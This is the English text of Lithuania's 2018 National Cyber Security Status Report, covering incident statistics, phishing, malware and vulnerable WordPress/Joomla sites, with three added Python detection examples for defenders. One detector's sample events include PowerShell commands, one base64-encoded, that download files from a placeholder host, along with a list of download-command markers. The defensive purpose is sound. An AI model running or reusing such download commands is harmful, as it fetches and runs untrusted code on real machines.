national cyber security status report 2018 · of the martynas mažvydas national library of...

2018 NATIONAL CYBER SECURITY STATUS REPORT

National Cyber Security Centre under the Ministry of National Defence

National Cyber Security Status Report 2018

Translation: Public Special Education and Counseling Center

Translation editors: Egle Ivanovaitė, Laimonas Brazaitis

Graphic designer: Raimonda Namikaitė

Circulation: 500 units. Order GL-230

Ministry of National Defence of the Republic of Lithuania, Totorių str. 25/3, LT-01121 Vilnius

Layout by the Visual Information Section of the General Affairs Department of the Ministry of National Defence, Totorių str. 25/3, LT-01121 Vilnius.

Printed by the Military Cartography Centre of the Lithuanian Armed Forces, Muitinės str., Domeikava, LT-54359 Kaunas District.


ISBN 978-609-412-172-2

TABLE OF CONTENTS

Terms

Abbreviations

Introduction

Summary

National cyber threat map

Cyber security challenges in 2018

Statistics of cyber incidents

Social engineering

Proliferation of malware

Vulnerable websites CMS

Electronic Communication Network Reconnaissance

Reliability of contractors and software

DDoS cyber incidents and equipment vulnerabilities

Notable cyber incidents

Information attacks

Increasing cyber security resistance

Organizing cyber security

Creating a cyber security environment

Conclusions and recommendations

Conclusions

Recommendations

The bibliographic information about the publication is available in the National Bibliographic Data Bank (NBDB) of the Martynas Mažvydas National Library of Lithuania.


TERMS

Critical Information Infrastructure – a communications and information system or part of it, or a group of communications and information systems, in which the occurrence of a cyber incident might have a major negative impact on national security, the economy of the country, and the interests of the state and the public.

Critical service – a service whose non-provision or disruption would have a significant negative impact on national security, the state economy, and public interests.

Cyber incident – an event or activity in cyber space which might pose or poses a threat to, or has a negative effect on, the accessibility, authenticity, integrity and confidentiality of digital information transmitted by use of communications and information systems or processed in such systems, or which might disrupt or disrupts the operation and management of communications and information systems and the provision of services to such systems.

Cyber security entity – an entity which controls and/or manages information resources of the state, a manager of critical information infrastructure, a service provider of public communications networks and/or public digital communication services, a provider of digital information hosting services, and providers of digital services.

Communication and Information System – a network of electronic communications, an information system, a registry, an industrial process management system, and digital information retained, processed, restored or transmitted for the purpose of their management, use, protection and maintenance.

State information resources – the totality of information managed by the institutions in the exercise of their statutory functions that is processed by means of information technology, and of the information technology tools used to process information.

ABBREVIATIONS

Botnet – network of computers or devices of Internet of Things that can execute distributed-denial-of-service cyber attacks

DDoS – distributed-denial-of-service cyber attack

IoT – devices of Internet of Things, for example smart TVs, smartphones, etc.

IT – Information Technologies

CII – Critical Information Infrastructure

NCSC – National Cyber Security Centre under the Ministry of National Defence

OS – operating system

SW – software

CIS – communication and information system

TLD – top level domain name system (for example, with suffix “.lt”)

Serv – server

CMS – content management system

SIR – state information resources


INTRODUCTION

From the cyber security viewpoint, numerous events occurred in Lithuania in 2018. Following the adoption of amendments to the Law on Cyber Security by the Seimas of the Republic of Lithuania on 19 December 2017, the capacities of CERT-LT¹ of the Communications Regulatory Authority, the Government Communications Centre under the Ministry of National Defence, and the National Cyber Security Centre under the Ministry of National Defence (hereinafter referred to as the NCSC) were integrated. Since 1 January 2018, the NCSC has been the central Lithuanian cyber security authority, responsible for the integrated management of cyber incidents, for monitoring and controlling the implementation of cyber security requirements, and for ensuring the protection of Critical Information Infrastructure (hereinafter referred to as CII) and the cyber security of other entities. Full attention to cyber security issues and the joint efforts of politicians and experts made it possible to gather a skill set at national level and to establish a clear direction for strengthening cyber security and specific actions to be taken over a period of several years. Lithuania's efforts in the area of cyber security have not gone unnoticed: Lithuania is among the leaders in terms of the Global Cyber Security Index.²

The new cyber security guidelines were established by the Lithuanian Cyber Security Strategy approved in 2018, which sets a unified direction for strengthening cyber security by 2023. The General Data Protection Regulation has prompted entities to be more proactive in managing cyber risks related to the protection of personal data. Lithuania has also engaged internationally in building cyber security competencies. In 2018, Lithuania started implementing the European Union Permanent Structured Cooperation Project "Cyber Rapid Response Teams and Mutual Assistance in Cyber Security", which was initiated in 2017. The implementation of organisational and technical cyber security requirements for cyber security entities (especially CII managers) and the development of the monitoring capacity of the NCSC contributed significantly to improving cyber security in Lithuania.

Technological development and the popularity of IoT not only facilitate everyday life, but also create new challenges. Antivirus software (hereinafter referred to as the SW), firewalls and other cyber security tools are unable to prevent all cyber threats. Technological solutions cannot fully protect and do not protect against new vulnerabilities and the emergence of the ways in which they can be exploited. Awareness, IT literacy and critical thinking remain the principal ways to combat cyber threats. In order to promote the relevance of cyber security and inform society about the cyber security status in Lithuania, the NCSC provides the third National Cyber Security Status Report. In this report, users are provided with key recommendations on how to manage the risks associated with cyber threats.

¹ CERT-LT – National Team of Information Technology Experts ready to respond to cyber incidents at national level (Computer Emergency Response Team)

² ITU – International Telecommunication Union, https://www.itu.int/en/ITU-D/Cybersecurity/Pages/global-cybersecurity-index.aspx


SUMMARY

The National Cyber Security Status Report is based on the NCSC's information about cyber incidents in Lithuania, and on the information collected and provided by cyber security entities and the Strategic Communication Department of the Lithuanian Armed Forces. A summary of the essential elements of this report is given below.

The number of cyber incidents, which had been growing for a long time, declined slightly in 2018. 53,183 cyber security incidents were registered in Lithuania, i.e. 3% fewer than in previous years. However, the complexity of cyber incidents has increased, attacks are becoming more sophisticated and it is impossible to investigate them by automated means. The NCSC investigated 914 cyber incidents of high and medium significance, which is 41% more than in 2017. Furthermore, in 2018, 21% more incidents due to vulnerabilities in equipment were registered. This is related to the increasing use of IoT devices.

In 2018, the largest amount of malware was detected in the government (39%), energy (20%), and foreign affairs and security policy (19%) sectors. The trend of malicious cyber activity remains a threat because the critical sectors in Lithuania are the target.

In 2018, the NCSC captured 25% more attempts to infiltrate CIS based on social engineering methods than in 2017. By pretending to be the managers of organisations and using social engineering methods, scammers continue trying to force the employees of organisations to make money remittances. Individuals with wicked intent also try to swindle money from users by offering goods for purchase on counterfeit websites. Social engineering methods are also used to execute malware on the computers of organizations and users.

Last year, the NCSC conducted cyber security checks on all Lithuanian websites (.lt). Unfortunately, as many as 52% of the 52,000 identified websites in Lithuania with a CMS are vulnerable. The most vulnerable are websites with the WordPress and Joomla CMS.

Software code may be safe, but mobile apps often ask for excess data or access to device functionality. This conclusion was reached when the NCSC initiated an analysis of the Yandex.Taxi mobile app. Usually, users give such access by agreeing to the terms of use of the software without thinking that their data unrelated to the service provided by the SW (such as contact details, recordings from the device microphone, photo gallery, etc.) may be leaked or accessible to third parties without their knowledge and consent.

In 2018, negative information activities were targeted at the most important areas of Lithuanian national security. A total of 2 456 cases with features of negative information activities were identified, i.e. an average of about 205 cases per month. The highest level of negative information activity was captured in the area of defence (29%). Such intensity was triggered not only by the flow of propaganda that usually affects Lithuania, but also by relevant events in the country that were artificially escalated by unfriendly sources.

Among cyber security entities implementing the organizational and technical cyber security requirements set by the Government of the Republic of Lithuania, the CII managers implemented 63% of organizational and 50% of technical cyber security requirements (last year the CII managers implemented only 26% of organizational and 6% of technical cyber security requirements).

In order to fully strengthen the cyber security environment, in 2018 the Ministry of National Defence and the NCSC signed a cooperation agreement with the media. Last year, the Ministry of National Defence, in cooperation with its partners, also began establishing a Regional Cyber Security Center in the city of Kaunas. The decision was made to develop a Secure National Data Transmission Network that connects institutions ensuring vital functions of the state.


NATIONAL CYBER THREAT MAP

| Trend | Cyber threat |
|---|---|
| Increased | Social engineering |
| Remained high | Prevalence of malware |
| Remained high | Vulnerable websites |
| New | Device vulnerabilities |
| Increased | Electronic communications network reconnaissance |
| New | Unreliability of contractors and / or software |
| Decreased | Interference with electronic services |

Table 1. In 2018, cyber security threats and trends compared to 2017.

The impact of cyber incidents based on social engineering methods was high in 2018. In cyberspace, 25% more cases were registered in which social engineering methods were used to manipulate Internet users through their indiscretion, trustfulness and lack of knowledge. Fraudulent and misleading e-mails continued to be sent, and messages with malicious code or links to malicious websites continued to be distributed. These methods enabled individuals with wicked intent to infiltrate the computers of cyber security entities, businesses and residents, to collect information, or to add computers to botnets and engage in malicious activity. Ordinary users who lack cyber security and IT literacy, which becomes the main reason for overwhelming the CIS, are at the greatest risk. This threat is also of great relevance for business entities, which lose confidential information or suffer direct financial loss due to cyber incidents based on social engineering methods (table 2).

Table 2. Influence of social engineering threat on national security, on business and SIR, and on residents

The prevalence of malware is also related to overwhelmed users and IoT devices. This means that the security measures did not work, the vulnerabilities of the software were exploited, the system was hacked, and the confidentiality, availability and integrity of information and / or services were affected. The threat of malware prevalence in Lithuania is considered high. Detection of malware in CII sectors poses a particular risk of affecting critical services of strategic importance that may have an effect at national and regional level (table 3).

Table 3. Influence of malware threat on national security, on business and SIR, and on residents

A large number of websites in Lithuania are vulnerable, mainly due to non-updated CMSs. Cyber security and business entities underestimate the potential damage they would suffer as a result of a cyber incident; they do not regard their websites as an important information asset that is necessary for their activities, and they also overlook the fact that some websites store personal data. For this reason, cyber incidents against the websites of cyber security entities would result in financial loss due to non-compliance with the provisions of the General Data Protection Regulation (table 4). According to the NCSC's current monitoring list of public sector websites, the situation in the public sector has improved. In 2018, the number of websites that are very easy to hack fell to 1%.

Table 4. Influence of vulnerable websites threat on national security, on business and SIR, and on residents

In 2018, the NCSC detected 21% more device vulnerabilities than in 2017. This is partly due to the prevalence of IoT devices. Furthermore, due to the current lack of regulation both in Lithuania and in the European Union, users purchase devices that are not subject to additional safety requirements. The devices purchased have open ports and unsafe passwords, do not encrypt communications, and have unsafe architecture and software code (table 5).

Table 5. Influence of device vulnerabilities threat on national security, on business and SIR, and on residents

Electronic communications network reconnaissance is related to the collection of information about CIS. These activities may not be malicious. However, since this kind of information collection is pervasive, interest in CIS, when devices and information about them are found through basic scans, can be the first step towards malicious activity. Internet-facing interfaces of devices involved in technological processes are of particular concern. After collecting information about such devices, individuals with wicked intent may try to interfere with services, which could also have physical effects that affect not only households (for example, heating) and businesses (for example, product manufacturing), but also nationally important services (for example, power supply, distribution or water purification processes) (table 6).

Table 6. Electronic communications network reconnaissance threats: influence on national security, on business and SIR, and on residents

In 2018, a new cyber security threat was observed in Lithuania, specifically the contractor reliability problem. In 2018, due to the contractor reliability problem, the Government of the Republic of Lithuania banned the use of Kaspersky LAB software in the SIR and CII. Additionally, the NCSC evaluated the Yandex.Taxi app and made public recommendations not to use this software. The relevance of the problem also relates to the fact that, from a technological point of view, products or services may be safe while the equipment or service providers are not. Having excessive access, as well as having confidential information at their disposal, such entities may pass on information about vulnerabilities or potential vectors of malicious activity to third parties, or may themselves be malicious intermediaries (table 7).

Table 7. Influence of threat of unreliability of contractors and / or equipment suppliers on national security, on business and SIR, and on residents

The level of threat of interference with electronic services decreased in 2018, because 40% fewer DDoS attacks were captured. This was influenced by the use of anti-DDoS security measures in the Lithuanian Internet infrastructure, as well as by services offered by Internet Service Providers and other solutions that help prevent cyber incidents of this kind (table 8).

Table 8. Influence of threat of interference with electronic services on national security, on business and SIR, and on residents


CYBER SECURITY CHALLENGES IN 2018

Statistics of cyber incidents

In 2018, the NCSC registered 53,183 cyber incidents in Lithuania, 3% less than in 2017.

The number of complex attacks increased – the NCSC investigated 914 cyber incidents of high and medium significance, 41% more than in 2017.

The NCSC identified 21% more vulnerabilities in Internet devices.

After evaluating cyber incident statistics, a slight decrease of 3% in registered incidents was recorded (table 9). In previous years, the number of cyber incidents in Lithuania increased by 10-20% annually. In 2018, the number of interferences with electronic services, electronic data counterfeiting and integrity violations decreased significantly. A comparison shows that incidents involving malware, information systems and device vulnerabilities are far more numerous than these types of cyber incidents. Compared to 2017, the number of devices with vulnerabilities increased by one fifth (21%) in 2018.

While overall cyber incident statistics show a small decrease in registered incidents, cyber incidents have become more sophisticated, i.e. the number of incidents of high and medium significance, which had to be processed manually by the specialists of the NCSC, increased by 41%, to 914 incidents (in 2017 – 536). In 2018, 52,269 incidents were processed by the NCSC using automatic means (in 2017 – 54,414).

Cyber incident detection tools, which operate automatically, processed fewer events than before because malware code has become more sophisticated and more difficult to detect under predefined rules and indicators. Advanced algorithms that can process more information are required to detect and prevent such cyber incidents and malware.


| Type | Number in 2018 | Change compared to 2017 |
|---|---|---|
| Malware | 10 822 | –5% |
| Hacking (overwhelming CIS) | 10 059 | –8% |
| CIS interference (DoS) | 31 | –40% |
| Counterfeiting of electronic data | 872 | –30% |
| Integrity violations | 24 | –50% |
| Device vulnerabilities | 29 747 | +21% |
| Of different nature | 1 628 | –76% |
| Total of incidents: | 53 183 | –3% |

Table 9. Information of the NCSC on cyber incidents, and change compared to 2017.

Social engineering

Using social engineering methods, fraudsters tried to swindle money from users by asking them to make money remittances, by pretending to be the heads of organisations, and by offering goods for purchase on fake websites.

Currently, social engineering methods are not limited to e-mails, the creation of fake websites or sending messages on social networking websites – individuals with wicked intent can call by phone or try to make contact in other ways.

Cyber incidents based on social engineering methods involve manipulating user actions on the Internet and fraud. Information is collected, malware is distributed, and vulnerabilities are exploited during them (fig. 1).

Reconnaissance | Weaponization | Delivery | Exploitation | Installation | Command and Control | Actions on objective

Fig. 1. Classification of cyber incidents based on social engineering methods by the Lockheed Martin "Cyber Kill Chain" model³

According to 2018 statistics, phishing, which includes fraudulent attempts to obtain passwords by e-mail, sending messages on social networking websites or luring users to fake websites, was the most popular cyber incident in Lithuania based on social engineering methods. Individuals with wicked intent also often use these methods to gain financial benefits. The incidence of cyber incidents of this type is particularly high during festive periods, when users are lured with discounts and offers that seem valuable. There are frequent cases where individuals with wicked intent, who pretend to be the CEOs of companies, give orders to accountants to make money remittances (example, fig. 2).

³ https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html


Fig. 2. The "director's" request to transfer funds that was received from a fake e-mail address.

Another example: because of malicious social engineering methods, users install malware in the CIS that, for example, starts running after the addressee opens the e-mail sent and enables reading of its contents (fig. 3).

Fig. 3. Titles of documents distributed by e-mail; clicking on them activates a macro command that downloads malware

Individuals with wicked intent may also call by phone and introduce themselves as CIS administrators or, by pretending to be thankful customers, they may try to donate or offer external storage media with malware on it.

| No | Threat | User tips |
|---|---|---|
| 1. | The user will click on the link to the malicious page. | Move the mouse cursor over the link and check that the website address displayed is genuine; make sure that the address does not contain grammatical errors and that the address name is logical and easy to read. |
| 2. | The user will enter his / her password on the counterfeit website. | Make sure the session with the website is encrypted, i.e. an SSL certificate is used (the website address must begin with the https tag); use multi-factor authentication tools (such as password, mobile device, fingerprint). |
| 3. | The user will reveal his / her login passwords to an individual with wicked intent. | Protect your login passwords: by no means keep them in the open at work, on your computer, or on your mobile phone. |
| 4. | The user will make a cash remittance to individuals with wicked intent. | Be critical about online ads and those sent by e-mail (especially be critical about big discounts offered); check requests to make cash remittances by other means, for example, verify the circumstances by phone call. |
| 5. | The user will install malware. | Do not open documents, files and software that have been sent or downloaded from an unreliable source (for example, from sources of illegal software distribution). |
| 6. | The user will give in to the manipulations of an individual with wicked intent. | Do not act hastily, avoid emotions, and fully clarify the necessity of the actions requested. |

Table 10. Basic ways of managing social engineering threats

After assessing monitoring data, in 2018, 25% more cyber incidents based on social engineering methods were recorded (fig. 4). The reason for this is the exploitation of the human factor for cyber attacks. Cyber security entities devote considerable resources to increasing CIS resilience and to protecting infrastructure by technical means. However, too little attention is still paid to educating and raising awareness among employees. Unfortunately, in the minds of individuals, cyber security continues to be a matter for IT professionals and hardware. In the event of a cyber incident, responsibility is usually transferred to the user, who is usually not properly informed or educated before the event about how to manage cyber security risks.

2016 - > 106 000

2017 - > 188 500

2018 - > 250 000

Fig. 4. Trends in Social Engineering in 2016–2018


Proliferation of malware

In 2018, most cases of malware were detected in government, energy, foreign affairs and security policy sectors.

The prevalence of malware is associated with overwhelming CIS, when attackers, after exploiting vulnerabilities, try to install malware on the CIS infrastructure. The executed malware gives access to the infrastructure, and the attacker can then perform other malicious activities (fig. 5).

Reconnaissance | Weaponization | Delivery | Exploitation | Installation | Command and Control | Actions on objective

Fig. 5. Classification of malware by the Lockheed Martin "Cyber Kill Chain" model

The tools used by the NCSC detect the malware before it is installed on the infrastructure, for example, when an activated e-mail attachment tries to establish a connection to download malware (fig. 6). A trend was noticed that users are sent links to cloud service websites (for example, onedrive.com, dropbox.com) that contain files with links to other malicious websites.

Fig. 6. A macro command is activated in a Windows OS ".docx" document; it activates "powershell" functionality and tries to download malware to the CIS
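
The behaviour described for fig. 6, an Office document whose macro starts PowerShell to download a file, can be recognised in process-creation logs. The following Python code is an added example, not the NCSC's tooling; it assumes events with Sysmon-style fields (`Computer`, `ParentImage`, `Image`, `CommandLine`), and all hosts, paths and URLs in the sample are constructed.

```python
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "net.webclient",
                    "invoke-webrequest", "start-bitstransfer")
URL_RE = re.compile(r"https?://[^\s'\"),]+")


def exe_name(path):
    """Lower-cased file name of a Windows or POSIX style path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(command_line):
    """Decode the argument of -EncodedCommand (or any prefix of it, or -ec).

    PowerShell expects base64 over UTF-16LE text; returns None if absent or invalid.
    """
    tokens = command_line.split()
    for flag, value in zip(tokens, tokens[1:]):
        name = flag[1:].lower()
        if flag[0] in "-/" and name and ("encodedcommand".startswith(name) or name == "ec"):
            try:
                return base64.b64decode(value, validate=True).decode("utf-16-le")
            except ValueError:  # covers bad base64 and bad UTF-16
                return None
    return None


def inspect_event(event):
    """Return a finding for an Office application that spawned PowerShell, else None."""
    if exe_name(event["ParentImage"]) not in OFFICE_PARENTS:
        return None
    if exe_name(event["Image"]) not in SHELLS:
        return None
    decoded = decode_encoded_command(event["CommandLine"])
    # Search the visible command line and, if present, the decoded payload.
    haystack = (event["CommandLine"] + " " + (decoded or "")).lower()
    return {
        "host": event["Computer"],
        "parent": exe_name(event["ParentImage"]),
        "encoded": decoded is not None,
        "download_markers": [m for m in DOWNLOAD_MARKERS if m in haystack],
        "urls": URL_RE.findall(haystack),
    }


def detect(events):
    """Run inspect_event over a batch and keep only the findings."""
    return [finding for finding in map(inspect_event, events) if finding]


# Constructed sample data: the encoded payload is built here so it can be read.
ENCODED = base64.b64encode(
    "Invoke-WebRequest -Uri https://cdn.example.invalid/x -OutFile x.bin".encode("utf-16-le")
).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
OFFICE = r"C:\Program Files\Microsoft Office\root\Office16"

SAMPLE_EVENTS = [
    {"Computer": "ws-014", "ParentImage": OFFICE + r"\WINWORD.EXE", "Image": PS,
     "CommandLine": r"powershell.exe -NoProfile -Command (New-Object Net.WebClient)"
                    r".DownloadFile('http://files.example.invalid/a.bin','C:\Users\Public\a.bin')"},
    {"Computer": "ws-014", "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe Get-ChildItem"},          # user-started shell
    {"Computer": "ws-022", "ParentImage": OFFICE + r"\EXCEL.EXE", "Image": PS,
     "CommandLine": "powershell.exe -NoP -W Hidden -enc " + ENCODED},
    {"Computer": "ws-022", "ParentImage": OFFICE + r"\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": r"C:\Windows\splwow64.exe 8192"},        # normal print helper
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

An Office parent with a PowerShell child is worth an alert even when no download marker is found; the markers and URLs only help to prioritise the investigation.
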

Other cases, in which the attacker has already taken over control of a CIS device, has unhindered access to the system and can perform malicious activity, are captured during investigations of cyber incidents (fig. 7).

Fig. 7. Information on successful malicious remote access to CIS

In 2018, the NCSC registered 10,822 cyber incidents associated with malware. Compared to previous years, the number of incidents of this type decreased by 5%. According to the NCSC classification, the NCSC registered 470 cyber incidents of medium and high significance that are related to malware detection, while in 2017 498 cases were identified (fig. 8).

In 2018, with the help of the technical measures used by the NCSC, most malware was detected in the government⁴ (39%), energy (20%) and foreign affairs and security policy (19%) sectors (fig. 9). The trend is still threatening because critical infrastructures on which services of public interest depend continue to be the target.

⁴ According to the Critical Information Infrastructure Identification Methodology, the sector of government is comprised of the service of the performance of state authority functions and handling of critical state information resources (information systems and registers of category one)


Fig. 8. Cyber incidents of medium and high significance that are related to malware detection, by entities (categories: CII manager, SIR managers and handlers; Legal entities)

Fig. 9. Malware detection by sectors (categories: Other; Public security and legal order sector; National defence sector; Financial sector; Foreign affairs and security policy sector; Energy sector; Government sector)

Table 11. Mitigation of malware threats

No | Threat | User tips

1 | By taking advantage of the vulnerability, the attacker will install malware on CIS. | Use legal OS and software, use antivirus software, scan the device periodically, and install the manufacturer's software updates as soon as they appear.

2 | The user downloads malware. | Do not download files from unreliable sources, install plugins in your browser to identify malicious websites, use antivirus software to scan suspicious files, and check downloaded files using the tools provided by the NCSC.*

3 | Malware from an infected USB stick will run automatically. | Do not use unreliable, unverified memory drives or other devices that connect via USB. Constantly format them and disable automatic file execution.

4 | Data encryption. | Back up your data periodically and keep backup copies separately (for example, on an external storage device).

5 | Malware will grant the attacker access to confidential information. | Encrypt confidential information and protect it with a secure password. Use cryptographic tools to transmit information, such as email encryption.

6 | Your computer will be infected through the CIS network. | Use network segmentation and several filtering tools (such as network and workstation firewalls), and physically separate important CISs.

* https://www.nksc.lt/irankiai.html


Vulnerable websites CMS

Half of the 52,000 websites in Lithuania with CMS are vulnerable.

Websites with WordPress and Joomla CMSs are the most vulnerable.

Websites that have vulnerabilities can be used to install malware, to hack, and to gain access to data, for example, through an administrator account. It should be noted that the information collected by the NCSC on vulnerable websites does not de facto imply that they have been taken over or that the vulnerabilities were exploited. However, it shows that there is a real chance of malicious access to the site's CMS or the information stored in it (fig. 10).

For example, in 2018 the NCSC investigated hacking into the website “skardzius.lt” on the server of the Seimas of the Republic of Lithuania (fig. 11). Website owners often leave access to the website CIS administrator accounts open and do not turn on a restriction on the number of login attempts. Consequently, malicious actors can hack into such websites by automated means, carrying out a so-called “brute force” cyber attack.

Fig. 10. Classification of cyber incidents on vulnerable websites by Lockheed Martin “Cyber Kill Chain” model (stages: Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command and Control, Actions on objective)

Cyber threats to websites are mainly due to the use of the most popular CMSs, such as WordPress, and the plugins associated with this CMS. When outdated CMSs are used, such websites become targets of attackers. After finding vulnerabilities, malicious actors can exploit them and customize tools for malware installation.

Fig. 11. Attempts to access the website skardzius.lt using “wp-login.php” functionality
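Login attempts of the kind described above, made against a site with no attempt limit, leave a recognisable trace in the web server's access log. The following added example (not NCSC code) flags clients that exceed a threshold of POST requests to wp-login.php within a sliding window. The log lines, addresses, window and threshold are constructed assumptions, and it assumes stock WordPress behaviour, where a failed login returns 200 and a successful one a 302 redirect.

```python
"""Flag wp-login.php brute-force bursts in a web access log (added example)."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Combined Log Format: ip ident user [time] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)

WINDOW = timedelta(seconds=60)  # assumed sliding window
THRESHOLD = 5                   # assumed maximum of login POSTs per window per client


def parse_line(line):
    """Return (ip, time, method, path, status) or None for unparsable lines."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    try:
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    except ValueError:
        return None
    path = m["path"].split("?", 1)[0]  # ignore query string
    return m["ip"], ts, m["method"], path, int(m["status"])


def detect_bruteforce(lines, window=WINDOW, threshold=THRESHOLD):
    """Scan time-ordered log lines; return {ip: finding} for offending clients."""
    recent = defaultdict(deque)  # ip -> timestamps of login POSTs inside the window
    findings = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path, status = rec
        if method != "POST" or not path.endswith("/wp-login.php"):
            continue
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) > threshold:
            f = findings.setdefault(
                ip, {"peak": 0, "first_seen": q[0], "login_succeeded": False})
            f["peak"] = max(f["peak"], len(q))
        # A redirect from an already flagged client suggests a guessed password.
        if ip in findings and status == 302:
            findings[ip]["login_succeeded"] = True
    return findings


def make_line(ip, second, method, status):
    """Build one constructed log line (sample data only)."""
    return (f'{ip} - - [14/Mar/2018:10:00:{second:02d} +0200] '
            f'"{method} /wp-login.php HTTP/1.1" {status} 4521 "-" "constructed-agent"')


# Constructed sample: one automated client, one ordinary administrator login,
# one visitor who only loads the login page, and one unparsable line.
SAMPLE_LOG = (
    [make_line("203.0.113.7", s, "POST", 200) for s in range(0, 40, 2)]
    + [make_line("203.0.113.7", 41, "POST", 302)]
    + [make_line("198.51.100.20", 50, "POST", 302)]
    + [make_line("192.0.2.15", 55, "GET", 200)]
    + ["garbage line that does not parse"]
)

if __name__ == "__main__":
    for ip, f in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, f["peak"], f["first_seen"].isoformat(), f["login_succeeded"])
```

A finding with `login_succeeded` set should be treated as a possible account takeover rather than only as noise to be rate-limited.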

In 2018, the NCSC conducted two checks on website cyber security: an assessment of CMS cyber security for all Lithuanian websites (.lt domain)⁵ and an assessment of the website security of the cyber security entities of the Lithuanian public sector⁶.

Over 110,000 Lithuanian top-level domain websites and about 1,200 public sector websites were analyzed. The CMS security assessment of all Lithuanian websites was performed by identifying vulnerable CMSs. The public sector survey was conducted on the basis of a statistical model, by analysing information sent by the server during normal web browsing (GET request HTTP header banner), technical data obtained from public directory databases, information about the host servers obtained by means of passive scanning, and information on the software of Website Broadcasting Services. Network services running over TCP/IP on ports 80 and 443 were assessed.
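A site owner can check what the same passive signals disclose about their own site. This added example (not the NCSC's survey method or code) audits a captured HTTP response for software banners, the generator meta tag and default CMS asset paths; both responses and all version strings are constructed, and the list of path hints is an assumption that covers only WordPress and Joomla.

```python
"""Audit what a web response discloses about server software and CMS (added example)."""
import re

VERSION_RE = re.compile(r"\d+(?:\.\d+)+")
GENERATOR_RE = re.compile(
    r'<meta\s+name=["\']generator["\']\s+content=["\']([^"\']+)["\']', re.I)
BANNER_HEADERS = ("server", "x-powered-by")
# Default asset paths that identify a CMS even when banners are removed.
CMS_PATH_HINTS = {
    "WordPress": ("/wp-content/", "/wp-includes/"),
    "Joomla": ("/media/jui/", "option=com_"),
}

# Constructed responses: an origin server answering directly, and the same
# site after banners were trimmed and asset paths rewritten.
ORIGIN_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.29 (Ubuntu)\r\n"
    "X-Powered-By: PHP/7.0.33\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    '<html><head><meta name="generator" content="WordPress 4.9.8">'
    '<link href="/wp-content/themes/x/style.css"></head></html>'
)
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: nginx\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    '<html><head><link href="/assets/style.css"></head></html>'
)


def parse_response(raw):
    """Split a raw HTTP response into a lower-cased header dict and the body."""
    head, _, body = raw.partition("\r\n\r\n")
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the status line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers, body


def grade(value):
    """A value carrying a version number discloses more than a product name."""
    return "version" if VERSION_RE.search(value) else "product"


def audit_disclosure(raw):
    """Return a list of (source, disclosed value, 'version' or 'product')."""
    headers, body = parse_response(raw)
    findings = []
    for name in BANNER_HEADERS:
        value = headers.get(name)
        if value:
            findings.append((f"header:{name}", value, grade(value)))
    generator = GENERATOR_RE.search(body)
    if generator:
        findings.append(("meta:generator", generator.group(1), grade(generator.group(1))))
    for cms, hints in CMS_PATH_HINTS.items():
        hit = next((h for h in hints if h in body), None)
        if hit:
            findings.append(("body:path", f"{cms} ({hit})", "product"))
    return findings


if __name__ == "__main__":
    for label, raw in (("origin", ORIGIN_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit_disclosure(raw))
```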

The survey found that 32% of websites use the open-source WordPress CMS, 5% use Joomla, and 9% use other CMSs. In the public sector, 25% of websites use the WordPress CMS, and 9% use the Joomla CMS (table 12).

⁵ Only websites whose CMSs could be identified and websites that use the most popular open-source CMSs were assessed during the survey, because they attract the most attention from malicious actors and are constantly subjected to takeover attempts using automated tools.

⁶ The list of public sector websites was based on information provided by the ministries and municipalities.


Table 12. CMSs summary

Content management system | General prevalence in Lithuania | Prevalence in the public sector

WordPress | 32% | 25%

Joomla | 5% | 9%

Other (Drupal, OpenCart, PrestaShop, Wix, Weebly, CMS Made Simple, Fresh Media, Idamas, CM4all, etc.) | 9% | 13%

Undetermined | 54% | 53%

The results of the Lithuania-wide CMS survey show that 52% of identifiable websites in Lithuania are vulnerable to cyber attacks (fig. 12). Some of them have very dangerous vulnerabilities, and 9% of them have extremely high vulnerabilities.

Fig. 12. 2018 assessment of cyber security of Lithuanian (.lt domain) websites according to information on CMS vulnerabilities (Secure: 48%; Vulnerable: 52%)

It was found that 32% of the investigated Lithuanian public sector websites are vulnerable to cyber attacks. The vast majority (21%) of vulnerable public sector websites can be easily hacked because the methods and tools for such hacking are available on the Internet, so malicious actors can easily use them. The NCSC worked directly with administrators whose websites had critical vulnerabilities (“worst of the worst”), and informed and supported the owners of public sector websites on how to prevent vulnerabilities. As a result, statistics show that in 2018 the number of websites that are very easy to hack decreased to a minimum (fig. 13).

Fig. 13. Vulnerable public sector websites, 2017 and 2018 (categories: Secure; Difficult to hack; Easy to hack; Very easy to hack).*

* Very easy to hack: no technical knowledge or special programming skills are needed to hack; instructions for the necessary actions are easily found on the Internet. Easy to hack: hacking requires skills and knowledge that are usually published in closed groups. Difficult to hack: hacking requires the knowledge of qualified professionals, often of several attackers, because the vulnerabilities are not yet publicly available.


Table 13. Mitigation of vulnerable websites threats

No | Threat | Recommended ways to manage threat

